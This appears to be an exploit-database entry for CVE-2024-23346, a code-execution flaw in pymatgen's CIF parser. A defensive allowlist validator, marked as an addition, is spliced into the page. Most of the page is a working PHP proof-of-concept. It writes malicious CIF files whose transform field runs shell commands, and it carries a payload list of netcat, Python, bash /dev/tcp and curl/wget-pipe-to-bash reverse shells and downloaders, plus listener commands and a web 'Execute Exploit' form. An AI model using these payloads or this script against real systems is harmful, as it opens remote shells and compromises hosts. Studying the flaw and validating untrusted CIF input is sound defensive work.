| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Command Injection in Materialsvirtuallab Pymatgen | 24 Jul 2025 18:12 | – | githubexploit |
| Exploit for Command Injection in Materialsvirtuallab Pymatgen | 9 Dec 2024 22:34 | – | githubexploit |
| Exploit for Command Injection in Materialsvirtuallab Pymatgen | 25 Feb 2025 14:52 | – | githubexploit |
| Exploit for Command Injection in Materialsvirtuallab Pymatgen | 20 Feb 2025 12:23 | – | githubexploit |
| CVE-2024-23346 | 21 Feb 2024 15:45 | – | circl |
| Pymatgen Security Vulnerability | 21 Feb 2024 00:00 | – | cnnvd |
| CVE-2024-23346 | 21 Feb 2024 16:13 | – | cve |
| CVE-2024-23346 pymatgen arbitrary code execution when parsing a maliciously crafted JonesFaithfulTransformation transformation_string | 21 Feb 2024 16:13 | – | cvelist |
| [SECURITY] [DSA 5763-1] pymatgen security update | 30 Aug 2024 18:05 | – | debian |
| CVE-2024-23346 | 21 Feb 2024 16:13 | – | debiancve |
=============================================================================================================================================
| # Title : Pymatgen 2024.1 CIF Parser Reverse Shell Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://pymatgen.org/ |
=============================================================================================================================================
[+] Summary :
Pymatgen version 2024.1 contains a critical remote code execution vulnerability in its Crystallographic Information File (CIF)
parser: a specially crafted CIF file can make the parser execute arbitrary Python code, leading to complete system compromise.
The flaw is in the CIF parser's handling of the _space_group_magn.transform_BNS_Pp_abc field. The field's value is passed to a
Python evaluator without any validation, so any Python expression embedded in it runs as soon as the file is parsed.
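A defender-side check, added here and not part of the author's exploit or of pymatgen itself: instead of letting the field reach an evaluator at all, validate it against an allowlist grammar for Jones-Faithful notation and flag CIF files whose transform_BNS_Pp_abc value contains anything else. The function names and the sample CIF snippets are my own constructions.

```python
import re

# CIF key the advisory above names; pymatgen hands its value to JonesFaithfulTransformation.
TRANSFORM_KEY = "_space_group_magn.transform_BNS_Pp_abc"

# Allowlist grammar for Jones-Faithful notation "P;p": three affine expressions in a, b, c
# with rational coefficients, optionally followed by ";" and three rational origin shifts,
# e.g. "a,b,c;0,0,0" or "-a+b,a,c;0,0,1/2". Nothing outside this grammar is accepted.
_NUM = r"(?:\d+(?:/\d+)?|\d*\.\d+)"
_TERM = rf"[+-]?(?:{_NUM}\*?)?[abc]"
_EXPR = rf"{_TERM}(?:[+-](?:{_NUM}\*?)?[abc])*"
_SHIFT = rf"[+-]?{_NUM}"
_JONES_RE = re.compile(
    rf"{_EXPR}\s*,\s*{_EXPR}\s*,\s*{_EXPR}\s*"
    rf"(?:;\s*{_SHIFT}\s*,\s*{_SHIFT}\s*,\s*{_SHIFT})?"
)

def is_safe_transformation_string(value: str) -> bool:
    """True only for pure Jones-Faithful notation. Brackets, dots, quotes, underscores or
    any name other than a/b/c fail the match, so a passing string carries no expression
    that an evaluator could run."""
    return _JONES_RE.fullmatch(value.strip()) is not None

def find_unsafe_transform_strings(cif_text: str) -> list[str]:
    """Return every TRANSFORM_KEY value in a CIF document that fails validation, so files
    from untrusted sources can be triaged before any parser touches them."""
    unsafe = []
    for raw in cif_text.splitlines():
        line = raw.strip()
        if not line.startswith(TRANSFORM_KEY):
            continue
        value = line[len(TRANSFORM_KEY):].strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]  # strip one layer of CIF quoting
        if not is_safe_transformation_string(value):
            unsafe.append(value)
    return unsafe

# Constructed sample inputs (not files from the page). The suspect one keeps only the shape
# of a hostile field, with an inert expression where a command would sit.
BENIGN_CIF = """data_benign
_space_group_magn.transform_BNS_Pp_abc 'a,b,c;0,0,0'
_space_group_magn.number_BNS 62.448
"""
SUSPECT_CIF = """data_suspect
_space_group_magn.transform_BNS_Pp_abc 'a,b,[x for x in ().__class__.__mro__];0,0,0'
"""
```

The same allowlist can sit in front of any code path that accepts a transformation string, not just the CIF reader, since the notation is identical everywhere pymatgen uses it.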
[+] POC :
php poc.php
<?php
class PymatgenRCEExploit {
private $ip;
private $port;
private $malicious_file = 'vuln.cif';
public function __construct($ip, $port) {
$this->ip = $ip;
$this->port = $port;
}
public function create_malicious_cif() {
$malicious_cif = <<<CIF
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {$this->ip} {$this->port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
CIF;
if (file_put_contents($this->malicious_file, $malicious_cif)) {
echo "[+] Malicious CIF file created: {$this->malicious_file}\n";
return true;
} else {
echo "[-] Failed to create malicious CIF file\n";
return false;
}
}
public function exploit() {
echo "[*] Starting Pymatgen RCE Exploit (CVE-2024-23346)\n";
echo "[*] Target: Pymatgen 2024.1\n";
echo "[*] Reverse Shell: {$this->ip}:{$this->port}\n";
if (!$this->create_malicious_cif()) {
return false;
}
if (!$this->check_dependencies()) {
return false;
}
echo "[*] Triggering the exploit by parsing malicious CIF file...\n";
$python_script = $this->generate_python_trigger();
$temp_python_file = 'trigger_exploit_' . bin2hex(random_bytes(4)) . '.py';
file_put_contents($temp_python_file, $python_script);
$output = shell_exec("python3 " . escapeshellarg($temp_python_file) . " 2>&1");
unlink($temp_python_file);
if (file_exists($this->malicious_file)) {
unlink($this->malicious_file);
}
echo "[*] Exploit triggered\n";
echo "[*] Check your listener for reverse shell connection\n";
if (!empty($output)) {
echo "[*] Python output: " . trim($output) . "\n";
}
return true;
}
private function check_dependencies() {
echo "[*] Checking dependencies...\n";
$python_check = shell_exec("which python3 2>/dev/null");
if (empty($python_check)) {
echo "[-] Python3 is not installed or not in PATH\n";
return false;
}
echo "[+] Python3 found: " . trim($python_check) . "\n";
$pymatgen_check = shell_exec("python3 -c 'import pymatgen; print(pymatgen.__version__)' 2>/dev/null");
if (empty($pymatgen_check)) {
echo "[-] Pymatgen is not installed\n";
echo "[*] Attempting to install pymatgen...\n";
$install_output = shell_exec("pip3 install pymatgen==2024.1 2>&1");
if (strpos($install_output, 'Successfully installed') === false) {
echo "[-] Failed to install pymatgen\n";
return false;
}
echo "[+] Pymatgen installed successfully\n";
} else {
echo "[+] Pymatgen found: version " . trim($pymatgen_check) . "\n";
if (version_compare(trim($pymatgen_check), '2024.1', '==')) {
echo "[+] Vulnerable version detected\n";
} else {
echo "[!] Different version detected: " . trim($pymatgen_check) . " - exploit may still work\n";
}
}
return true;
}
private function generate_python_trigger() {
return <<<PYTHON
import sys
import os
try:
    from pymatgen.io.cif import CifParser
    print("[*] Attempting to parse malicious CIF file...")
    parser = CifParser("{$this->malicious_file}")
    structure = parser.parse_structures()
    print("[+] CIF file parsed successfully")
except Exception as e:
    print(f"[-] Error during parsing: {e}")
    sys.exit(1)
PYTHON;
}
public function generate_listener_commands() {
echo "\n[*] Setup listener using one of these commands:\n";
echo " nc -lvnp {$this->port}\n";
echo " ncat -lvnp {$this->port}\n";
echo " socat TCP-LISTEN:{$this->port},reuseaddr,fork EXEC:/bin/bash\n";
}
}
class PymatgenAlternativeExploits {
public static function generate_different_payload($ip, $port, $payload_type = 'reverse_shell') {
$payloads = [
'reverse_shell' => "nc {$ip} {$port} -e /bin/bash",
'python_reverse' => "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{$ip}\",{$port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'",
'bash_reverse' => "bash -i >& /dev/tcp/{$ip}/{$port} 0>&1",
'curl_download' => "curl http://{$ip}:8000/shell.sh | bash",
'wget_download' => "wget -q -O - http://{$ip}:8000/shell.sh | bash"
];
return $payloads[$payload_type] ?? $payloads['reverse_shell'];
}
public static function create_advanced_malicious_cif($ip, $port, $payload_type = 'reverse_shell') {
$payload = self::generate_different_payload($ip, $port, $payload_type);
$encoded_payload = base64_encode($payload);
$advanced_payload = "echo '{$encoded_payload}' | base64 -d | bash";
$malicious_cif = <<<CIF
data_CVE_2024_23346
_audit_creation_date 2024-11-13
_audit_creation_method "Research Purpose Only"
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__bases__[0].__subclasses__() if d.__name__ == "BuiltinImporter"][0].load_module("os").system("{$advanced_payload}");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
CIF;
return $malicious_cif;
}
}
class SimplePymatgenExploit {
public static function quick_exploit($ip, $port) {
$cif_content = self::generate_malicious_cif($ip, $port);
$filename = 'exploit_' . bin2hex(random_bytes(4)) . '.cif';
file_put_contents($filename, $cif_content);
$python_code = "
from pymatgen.io.cif import CifParser
try:
    parser = CifParser('{$filename}')
    structures = parser.parse_structures()
    print('Exploit triggered successfully')
except Exception as e:
    print(f'Error: {e}')
";
$temp_py = 'temp_exploit.py';
file_put_contents($temp_py, $python_code);
echo "[*] Executing exploit...\n";
system("python3 {$temp_py}");
unlink($filename);
unlink($temp_py);
}
private static function generate_malicious_cif($ip, $port) {
return <<<CIF
data_Exploit
_audit_creation_date 2024-11-13
_space_group_magn.transform_BNS_Pp_abc 'a,b,[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "BuiltinImporter"][0].load_module("os").system("nc {$ip} {$port} -e /bin/bash");0,0,0'
CIF;
}
}
if (php_sapi_name() === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
if ($argc < 3) {
echo "Pymatgen 2024.1 Remote Code Execution (CVE-2024-23346)\n";
echo "======================================================\n";
echo "Usage: php " . $argv[0] . " <LHOST> <LPORT>\n";
echo "Example: php " . $argv[0] . " 192.168.1.100 4444\n";
echo "\nAdditional options (environment variables):\n";
echo "PAYLOAD_TYPE=reverse_shell|python_reverse|bash_reverse\n";
echo "QUICK_MODE=true\n";
exit(1);
}
$lhost = $argv[1];
$lport = $argv[2];
$payload_type = getenv('PAYLOAD_TYPE') ?: 'reverse_shell';
$quick_mode = getenv('QUICK_MODE') === 'true';
try {
if ($quick_mode) {
echo "[*] Running in quick mode...\n";
SimplePymatgenExploit::quick_exploit($lhost, $lport);
} else {
$exploit = new PymatgenRCEExploit($lhost, $lport);
if ($exploit->exploit()) {
$exploit->generate_listener_commands();
}
}
echo "\n[*] Note: This exploit targets CVE-2024-23346 in Pymatgen 2024.1\n";
echo "[*] The vulnerability is in the CIF parser's handling of malicious input\n";
} catch (Exception $e) {
echo "[-] Exploit failed: " . $e->getMessage() . "\n";
exit(1);
}
}
if (isset($_GET['web']) && $_GET['web'] === 'true') {
header('Content-Type: text/html; charset=utf-8');
?>
<!DOCTYPE html>
<html>
<head>
<title>Pymatgen RCE Exploit (CVE-2024-23346)</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.container { max-width: 800px; margin: 0 auto; }
.form-group { margin: 15px 0; }
label { display: block; margin-bottom: 5px; }
input, select { padding: 8px; width: 200px; }
button { padding: 10px 20px; background: #007cba; color: white; border: none; cursor: pointer; }
.output { background: #f4f4f4; padding: 15px; margin: 15px 0; white-space: pre-wrap; }
</style>
</head>
<body>
<div class="container">
<h1>Pymatgen RCE Exploit (CVE-2024-23346)</h1>
<?php
if ($_POST['exploit'] ?? false) {
$ip = $_POST['ip'] ?? '';
$port = $_POST['port'] ?? '';
$payload_type = $_POST['payload_type'] ?? 'reverse_shell';
if (!empty($ip) && !empty($port)) {
echo "<div class='output'>";
try {
$exploit = new PymatgenRCEExploit($ip, $port);
$exploit->exploit();
$exploit->generate_listener_commands();
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
echo "</div>";
}
}
?>
<form method="post">
<input type="hidden" name="exploit" value="true">
<div class="form-group">
<label>Your IP Address:</label>
<input type="text" name="ip" value="<?= $_SERVER['REMOTE_ADDR'] ?? '' ?>" required>
</div>
<div class="form-group">
<label>Listener Port:</label>
<input type="number" name="port" value="4444" required>
</div>
<div class="form-group">
<label>Payload Type:</label>
<select name="payload_type">
<option value="reverse_shell">Netcat Reverse Shell</option>
<option value="python_reverse">Python Reverse Shell</option>
<option value="bash_reverse">Bash Reverse Shell</option>
</select>
</div>
<button type="submit">Execute Exploit</button>
</form>
<div style="margin-top: 30px; font-size: 0.9em; color: #666;">
<strong>Note:</strong> This exploit requires pymatgen 2024.1 to be installed on the target system.
The vulnerability allows remote code execution through malicious CIF file parsing.
</div>
</div>
</body>
</html>
<?php
exit;
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================